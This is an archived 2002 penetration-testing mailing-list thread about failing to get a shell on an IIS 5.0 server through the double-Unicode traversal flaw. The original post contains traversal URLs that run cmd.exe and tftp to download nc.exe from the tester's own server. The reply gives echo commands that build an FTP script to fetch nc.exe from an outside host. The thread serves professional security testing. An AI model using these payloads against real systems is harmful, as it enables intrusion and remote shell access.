Penetration Testing mailing list archives
RE: Can't get a shell
From: "Jeremy Junginger" <jjunginger () interactcommerce com>
Date: Thu, 11 Jul 2002 10:06:25 -0700
Use ftp with a script if ftp is allowed outbound. Example: Open x.x.x.x >ftpscript Echo user >>ftpscript Echo password >>ftpscript Echo get nc.exe >>ftpscript Echo quit >>ftpscript And then at the prompt, fire up: Ftp -s:ftpscript And that should get you what you need, right?? -Jeremy -----Original Message----- From: Gaziel, Avishay [mailto:agaziel () kpmg com] Sent: Tuesday, July 09, 2002 9:33 AM To: PEN-TEST () securityfocus com Subject: Can't get a shell Hi All, Situation: An IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.) IIS sitting behind a firewall. Problem: host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+myserver +get +nc.exe doesn't work I keep getting (from my pumpkin tftp server) an error message saying that there's something wrong with the variables. another strange thing is that even if I don't get the error message the tftp session will not start and will timeout, if I deny access I keep getting access requests from the IIS.(Pumpkin is configured to prompt whenever a download/upload starts) What have I tried to do? Use host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+myserver+get+ nc.e xe instead of the above mentioned...doesn't work as well. What do I think is wrong? The FW is blocking all udp traffic out. What do I need? 1. Suggestions 2.Workarounds Avishay ************************************************************************ ***** The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter. ************************************************************************ ***** ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Attachment:
smime.p7s
Description:
Current thread:
- Can't get a shell Gaziel, Avishay (Jul 11)
- RE: Can't get a shell Coral J. Cook (Jul 11)
- <Possible follow-ups>
- RE: Can't get a shell Rico Valdez (Jul 11)
- RE: Can't get a shell Jeremy Junginger (Jul 11)